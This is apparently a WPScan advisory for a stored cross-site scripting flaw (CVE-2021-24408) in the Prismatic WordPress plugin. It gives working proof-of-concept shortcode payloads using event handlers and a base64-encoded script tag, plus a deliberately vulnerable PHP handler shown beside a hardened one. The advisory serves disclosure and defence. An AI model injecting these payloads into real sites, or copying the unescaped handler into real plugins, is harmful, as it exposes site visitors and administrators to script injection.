WPScan

WordPress Plugin Vulnerabilities

Prismatic < 2.8 - Contributor+ Stored XSS

Description

The plugin does not sanitise or validate some of its shortcode parameters, allowing users with a role as low as Contributor to place Cross-Site Scripting payloads in them. A post written by a Contributor still has to be approved by an administrator before the XSS can trigger in the frontend; higher-privileged users such as Editors, however, can exploit this without approval, and even when the blog disallows the unfiltered_html capability (the capability that would otherwise be required to put raw HTML or JavaScript into a post).

Injection Points:
1) The "class" attribute of the prismatic_code shortcode
2) HTML attributes on the prismatic_encoded shortcode-like syntax nested inside a prismatic_code shortcode
3) A Base64-encoded payload inside the prismatic_encoded shortcode-like syntax nested inside a prismatic_code shortcode

Proof of Concept

The following payload contains three XSS, each injected at a different location:

[prismatic_code class='hello" style="animation-name:twentytwentyone-close-button-transition;" onanimationstart="alert(1)']
[prismatic_encoded style=%%animation-name:twentytwentyone-close-button-transition;%% onanimationstart=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


The first two payloads (animation-name/onanimationstart) are specific to the Twenty Twenty-One theme, which defines the referenced keyframe animation, so they fire without any user interaction beyond loading the page.

To try with another theme (the user then has to click the generated elements in the page to trigger the first two XSS):
[prismatic_code class='hello" onclick="alert(1)']
[prismatic_encoded onclick=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+ = base64("<script>alert(origin)</script>"); this is the third payload, decoded and output by the plugin.
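As an added illustration (not Prismatic's own code), the hypothetical [demo_code] shortcode handler below reproduces the pattern the description and proof of concept rely on: a "class" attribute written into the tag unescaped, so a single-quoted value containing a double quote closes the attribute and appends an event handler, and a Base64-encoded body that is decoded and echoed as markup. The second function is one way to harden the same handler with WordPress's own escaping helpers. The function names, the demo_code shortcode name and the <pre> wrapper are assumptions made for the example.

```php
<?php
/*
 * Added example, not Prismatic's code. A hypothetical [demo_code] shortcode
 * showing the unescaped-attribute and decoded-body pattern described in the
 * advisory, followed by a hardened version. Requires WordPress for
 * shortcode_atts(), sanitize_html_class(), esc_attr(), esc_html().
 */

// Vulnerable: attribute and decoded body are concatenated straight into HTML.
// With class='hello" onclick="alert(1)' the output becomes
//   <pre class="hello" onclick="alert(1)">...</pre>
// and a base64("<script>...</script>") body is emitted as live markup.
function demo_code_vulnerable( $atts, $content = '' ) {
	$atts = shortcode_atts( array( 'class' => '' ), $atts, 'demo_code' );
	$body = base64_decode( $content );
	return '<pre class="' . $atts['class'] . '">' . $body . '</pre>';
}

// Hardened: restrict the class token(s) and escape everything that is echoed.
function demo_code_fixed( $atts, $content = '' ) {
	$atts = shortcode_atts( array( 'class' => '' ), $atts, 'demo_code' );

	// sanitize_html_class() keeps only [A-Za-z0-9_-], so a quote or a space
	// can never close the attribute. Applied per token so "a b" stays valid.
	$tokens  = preg_split( '/\s+/', trim( $atts['class'] ), -1, PREG_SPLIT_NO_EMPTY );
	$classes = implode( ' ', array_map( 'sanitize_html_class', $tokens ) );

	// Strict decoding rejects input that is not well-formed base64.
	$body = base64_decode( $content, true );
	if ( false === $body ) {
		$body = '';
	}

	// esc_attr() for the attribute, esc_html() for the body: the decoded
	// "<script>" is rendered as &lt;script&gt; text instead of executing.
	return '<pre class="' . esc_attr( $classes ) . '">' . esc_html( $body ) . '</pre>';
}

add_shortcode( 'demo_code', 'demo_code_fixed' );
```

The hardened handler turns the PoC value hello" onclick="alert(1) into the harmless tokens "hello onclickalert1". For a code-highlighting shortcode whose class is really a language name, a stricter fix is to compare the value against an explicit allowlist of supported languages and drop anything else.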

Affects Plugins

prismatic
Fixed in version 2.8

References

CVE
CVE-2021-24408

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
51855853-e7bd-425f-802c-824209f4f84d

Timeline

Publicly Published

2021-06-21

Added

2021-06-21

Last Updated

2021-06-25
